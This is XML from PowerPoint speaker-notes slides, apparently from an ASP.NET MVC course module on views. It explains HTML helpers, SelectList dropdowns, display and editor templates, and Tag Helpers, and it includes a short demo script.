              <a:rPr lang="en-US" dirty="0"/>
              <a:t>View Engines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passing data to views</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Partial Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3303219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791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9EEB41-EBB5-4D09-977D-3A6E65EE327B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34814476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dirty="0"/>
              <a:t>Anything else you include is up to you, because they return HTML; you can use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TagBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to build up HTML strings without needing to deal with all of the escaping and special characters. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{537ED7AC-D90E-44FA-813E-55CE8F1A06C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Image Placeholder 6"/>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37699453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dirty="0"/>
              <a:t>Check box renders two inputs, one for the hidden input element because the browser does not submit a value for the check box (like false) when not selected. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you specify a key (like @Html.Textbox(“key”), it will search ViewBag, ViewData and the model properties for a match.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ViewBag.DataValue </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ViewData["DataValue"] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@Model.DataValue </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Note:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> You can also use these strongly typed (Html.TextBoxFor(x =&gt; x.Name) with lambdha expressions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="173028" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-- for DropDownList – do a demo… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173028" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Create person class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173028" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@Html.DropDownList("MyListz", "Choose");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173028" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173028" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> var people = new List&lt;Person&gt;(){new Person(){PersonId=124,FullName="Robert"}, new Person(){PersonId=23, FullName="judy"}};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173028" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173028" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            ViewBag.MyListz = new SelectList(people,  // items</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173028" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                                       "PersonId",   // dataValueField</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173028" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                                       "FullName", // dataTextField</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173028" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                                       124);           // selectedValue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{537ED7AC-D90E-44FA-813E-55CE8F1A06C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Image Placeholder 6"/>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30429207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dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://exceptionnotfound.net/asp-net-mvc-demystified-display-and-editor-templates/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASP.NET MVC includes built-in templates for editor and display. The included display templates are shown here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>EmailAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Renders a link with a mailto URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HiddenInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Hides the display value.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Renders the formatted model value.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Text and Raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Renders the raw content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Combines the model and formatted model value to render a link.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Collection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Loops through an IEnumerable and renders the template for each item.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Renders a check box for regular Boolean values or drop-down list for collection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Decimal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Formats the value with two decimals of precision.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Renders the raw content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Loops through all the properties of the object and renders the display template for each property.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{537ED7AC-D90E-44FA-813E-55CE8F1A06C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Image Placeholder 6"/>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16571196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b="1" dirty="0"/>
              <a:t>HiddenInput </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– This uses the HtmlHelper.Hidden extension method to render a &lt;input type="hidden" /&gt; element</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>MultilineText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - HtmlHelper.TextArea extension method to render a multiline input element.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - The HtmlHelper.Password extension method renders a password input element.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- The HtmlHelper.TextBox extension method renders a text input element.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Collection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Loops through an IEnumerable and renders the template for each item Boolean - Renders a check box for regular Boolean values and a drop-down list.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Decimal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Formats the decimal value with two decimals of precision inside a text box.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- HtmlHelper.TextBox extension method renders a text input element.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Loops through all the properties of the object and renders the editor template for each property.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{537ED7AC-D90E-44FA-813E-55CE8F1A06C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Image Placeholder 6"/>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14375753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dirty="0"/>
              <a:t>Templates can be shared across the site by including them in the Shared folder or for specific Views including them in that View Folder which will override the Shared folder. Both Editor and Display templates follow the convention and are named after the type they are for. EditorFor will search for EditorTemplates for the given type, same for DisplayFor and DisplayTemplates. For IEnumerable, the MVC subsystem will iterate through a collection and use the EditorTemplate or DisplayTemplate for each item in the collection – automatically. Editor and DisplayTemplates have more access to Model Metadata than views.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{537ED7AC-D90E-44FA-813E-55CE8F1A06C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Image Placeholder 6"/>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168808195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b="1" dirty="0"/>
              <a:t>Demo Script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open project MVCRazorDemo2 from \Demos\Module 04 - Views\MVCRazorDemo2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>UserModels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> controller and show all view(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Index,Details,Edit,Delete,Create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) and explain how html templates are transforming model to html markup.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9EEB41-EBB5-4D09-977D-3A6E65EE327B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Image Placeholder 6"/>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65292468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dirty="0"/>
              <a:t>Tag Helpers is preferred over HTML Helpers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9EEB41-EBB5-4D09-977D-3A6E65EE327B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129769553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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>An HTML-friendly development experience</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For the most part, Razor markup using Tag Helpers looks like standard HTML. Front-end designers conversant with HTML/CSS/JavaScript can edit Razor without learning C# Razor syntax.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A rich IntelliSense environment for creating HTML and Razor markup</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is in sharp contrast to HTML Helpers, the previous approach to server-side creation of markup in Razor views. Tag Helpers compared to HTML Helpers explains the differences in more detail. IntelliSense support for Tag Helpers explains the IntelliSense environment. Even developers experienced with Razor C# syntax are more productive using Tag Helpers than writing C# Razor markup.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A way to make you more productive and able to produce more robust, reliable, and maintainable code using information only available on the server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, historically the mantra on updating images was to change the name of the image when you change the image. Images should be aggressively cached for performance reasons, and unless you change the name of an image, you risk clients getting a stale copy. Historically, after an image was edited, the name had to be changed and each reference to the image in the web app needed to be updated. Not only is this very labor intensive, it is also error prone (you could miss a reference, accidentally enter the wrong string, etc.) The built-in ImageTagHelper can do this for you automatically. The ImageTagHelper can append a version number to the image name, so whenever the image changes, the server automatically generates a new unique version for the image. Clients are guaranteed to get the current image. This robustness and labor savings essentially come free by using the ImageTagHelper. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{73CFBB7B-29F3-4A9F-B039-645092B1B4E9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295788516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9DB6A-E92B-415B-AFB4-9C72D4A9006D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2748283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89920E16-7E2D-4061-8759-5F8497A7A433}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Image Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="484188"/>
            <a:ext cx="6096000" cy="3429000"/>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319152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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The @addTagHelper directive makes Tag Helpers available to the view. In this case, the view file is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Views/_ViewImports.cshtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which by default is inherited by all view files in the Views folder and sub-directories; making Tag Helpers available. The code above uses the wildcard syntax (“*”) to specify that all Tag Helpers in the specified assembly (Microsoft.AspNet.Mvc.TagHelpers) will be available to every view file in the Views directory or sub-directory. The first parameter after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>@addTagHelper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> specifies the Tag Helpers to load (we are using “*” for all Tag Helpers), and the second parameter “Microsoft.AspNet.Mvc.TagHelpers” specifies the assembly containing the Tag Helpers. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Microsoft.AspNet.Mvc.TagHelpers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is the assembly for the built-in ASP.NET 5 Tag Helpers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@removeTagHelper removes Tag Helpers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>@removeTagHelper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has the same two parameters as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>@addTagHelper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and it removes a Tag Helper that was previously added. For example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>@removeTagHelper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> applied to a specific view removes the specified Tag Helper from the view. Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>@removeTagHelper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Views/Folder/_ViewImports.cshtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file removes the specified Tag Helper from all of the views in the Folder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
